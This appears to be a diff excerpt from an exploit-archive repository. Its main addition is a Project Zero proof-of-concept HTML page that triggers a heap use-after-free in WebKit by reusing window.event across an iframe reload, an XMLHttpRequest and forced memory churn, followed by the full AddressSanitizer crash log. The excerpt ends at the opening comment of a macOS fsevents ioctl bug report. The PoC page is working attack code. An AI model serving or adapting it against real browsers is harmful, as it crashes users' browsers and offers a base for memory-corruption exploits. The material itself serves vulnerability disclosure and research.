0x1c1800013a50: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x1c1800013a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1800013a70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800013a80: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
=>0x1c1800013a90: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fa
0x1c1800013aa0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c1800013ab0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c1800013ac0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1800013ad0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c1800013ae0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1460==ABORTING
-->

195
platforms/multiple/dos/41814.html Executable file
View file

@ -0,0 +1,195 @@
<!--
Source :https://bugs.chromium.org/p/project-zero/issues/detail?id=1114
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function freememory() {
var a;
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
function f1() {
var iframe = document.getElementById("iframe");
iframe.srcdoc = "x";
window.frames.event = window.event;
freememory();
}
function f2() {
var h = new XMLHttpRequest();
h.onreadystatechange = f1;
h.open("foo","1");
var e = window.event;
e.initEvent("1",true,true);
e.currentTarget.click();
}
</script>
</head>
<body onload=f1()>
<iframe id="iframe" onload="f2()"></iframe>
<!--
=================================================================
ASan log:
=================================================================
==25184==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a000076e80 at pc 0x000115bea4e0 bp 0x7fff52cef2e0 sp 0x7fff52cef2d8
READ of size 8 at 0x61a000076e80 thread T0
#0 0x115bea4df in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::EventTarget&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x138c4df)
#1 0x115bc7b72 in WebCore::jsEventCurrentTargetGetter(JSC::ExecState&, WebCore::JSEvent&, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1369b72)
#2 0x115bc4c06 in long long WebCore::BindingCaller<WebCore::JSEvent>::attribute<&(WebCore::jsEventCurrentTargetGetter(JSC::ExecState&, WebCore::JSEvent&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1366c06)
#3 0x1121bd448 in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1587448)
#4 0x111ef652e in llint_slow_path_get_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c052e)
#5 0x111f13926 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12dd926)
#6 0x111f17490 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1490)
#7 0x111f10aca in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12daaca)
#8 0x111bca172 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf94172)
#9 0x111b4fa33 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf19a33)
#10 0x11123d5c1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6075c1)
#11 0x11123d6eb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6076eb)
#12 0x11123da36 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x607a36)
#13 0x1158ea62e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x108c62e)
#14 0x115bde086 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1380086)
#15 0x115123415 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c5415)
#16 0x115122f3f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c4f3f)
#17 0x1150ebe35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88de35)
#18 0x1150ecf83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88ef83)
#19 0x1150ec9aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88e9aa)
#20 0x115020db5 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c2db5)
#21 0x114f311df in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d31df)
#22 0x114f2be4e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cde4e)
#23 0x11528c8e1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2e8e1)
#24 0x115289dfa in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2bdfa)
#25 0x114f4996d in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6eb96d)
#26 0x11544048d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe248d)
#27 0x114fddb1c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77fb1c)
#28 0x114fa287e in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74487e)
#29 0x114fa5a53 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x747a53)
#30 0x114fa407d in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74607d)
#31 0x114fa0a92 in WebCore::DocumentLoader::handleSubstituteDataLoadNow() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x742a92)
#32 0x11250aeaa in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d4eaa)
#33 0x7fff9d2f6af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)
#34 0x7fff9d2f6782 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92782)
#35 0x7fff9d2f62d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x922d9)
#36 0x7fff9d2ed7d0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x897d0)
#37 0x7fff9d2ece37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#38 0x7fff9b506934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#39 0x7fff9b50676e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#40 0x7fff9b5065ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#41 0x7fff91794df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#42 0x7fff91794225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#43 0x7fff91788d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#44 0x7fff91752367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#45 0x7fff96d41193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#46 0x7fff96d3fbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#47 0x10cf0cb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#48 0x7fffa08505ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x61a000076e80 is located 0 bytes inside of 1376-byte region [0x61a000076e80,0x61a0000773e0)
freed by thread T0 here:
#0 0x10f50bcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x11255181f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191b81f)
#2 0x111cb4d58 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107ed58)
#3 0x111cb355e in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107d55e)
#4 0x111cb2003 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107c003)
#5 0x111cb17e6 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107b7e6)
#6 0x111cb143a in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107b43a)
#7 0x111f2b905 in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f5905)
#8 0x111f26e74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f0e74)
#9 0x111f268e8 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f08e8)
#10 0x111f2775e in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f175e)
#11 0x115a154b9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b74b9)
#12 0x115a15104 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b7104)
#13 0x115a1504b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b704b)
#14 0x115a14e17 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b6e17)
#15 0x115a1457c in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b657c)
#16 0x115a14746 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b6746)
#17 0x115f0dc3a in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16afc3a)
#18 0x1154ddca8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc7fca8)
#19 0x115b8e39c in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x133039c)
#20 0x116d5dfb1 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24fffb1)
#21 0x10d20ba77 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2eba77)
#22 0x10d208c18 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2e8c18)
#23 0x10d4d2fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5b2fc4)
#24 0x1247b2b61 in -[OpenSearchURLFinderController _jsContext] (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0x330b61)
#25 0x1247b28b9 in -[OpenSearchURLFinderController initWithBundleFrame:] (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0x3308b9)
#26 0x124523a29 in Safari::BrowserBundlePageController::determineOpenSearchURL(Safari::WK::BundleFrame const&) (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0xa1a29)
#27 0x1245239a3 in invocation function for block in Safari::BrowserBundlePageController::determineOpenSearchURLSoon() (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0xa19a3)
#28 0x7fffa0df7deb in __NSFireTimer (/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation+0xa9deb)
#29 0x7fff9d2f6af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)
previously allocated by thread T0 here:
#0 0x10f50b790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff948155a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x11255b314 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1925314)
#3 0x1125505db in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191a5db)
#4 0x1124e8635 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b2635)
#5 0x1124e7918 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b1918)
#6 0x1175c6389 in WebCore::XMLHttpRequest::create(WebCore::ScriptExecutionContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2d68389)
#7 0x11644fc8c in WebCore::JSDOMConstructor<WebCore::JSXMLHttpRequest>::construct(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1bf1c8c)
#8 0x111f0df2e in JSC::LLInt::handleHostCall(JSC::ExecState*, JSC::Instruction*, JSC::JSValue, JSC::CodeSpecializationKind) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d7f2e)
#9 0x111f08149 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d2149)
#10 0x111f17827 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1827)
#11 0x111f17502 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1502)
#12 0x111f10aca in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12daaca)
#13 0x111bca172 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf94172)
#14 0x111b4fa33 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf19a33)
#15 0x11123d5c1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6075c1)
#16 0x11123d6eb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6076eb)
#17 0x11123da36 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x607a36)
#18 0x1158ea62e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x108c62e)
#19 0x115bde086 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1380086)
#20 0x115123415 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c5415)
#21 0x115122f3f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c4f3f)
#22 0x1150ebe35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88de35)
#23 0x1150ecf83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88ef83)
#24 0x1150ec9aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88e9aa)
#25 0x115020db5 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c2db5)
#26 0x114f311df in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d31df)
#27 0x114f2be4e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cde4e)
#28 0x11528c8e1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2e8e1)
#29 0x115289dfa in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2bdfa)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x138c4df) in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::EventTarget&)
Shadow bytes around the buggy address:
0x1c340000ed80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c340000ed90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c340000eda0: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc
0x1c340000edb0: fc fc fc fc fc fc fc fc fc fc fc fa fa fa fa fa
0x1c340000edc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c340000edd0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c340000ede0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c340000edf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c340000ee00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c340000ee10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c340000ee20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25184==ABORTING
-->

220
platforms/multiple/local/41804.c Executable file
View file

@ -0,0 +1,220 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1129
fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents
Heres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl:
case FSEVENTS_DEVICE_FILTER_64:
if (!proc_is64bit(vfs_context_proc(ctx))) {
ret = EINVAL;
break;
}
devfilt_args = (fsevent_dev_filter_args64 *)data;
handle_dev_filter:
{
int new_num_devices;
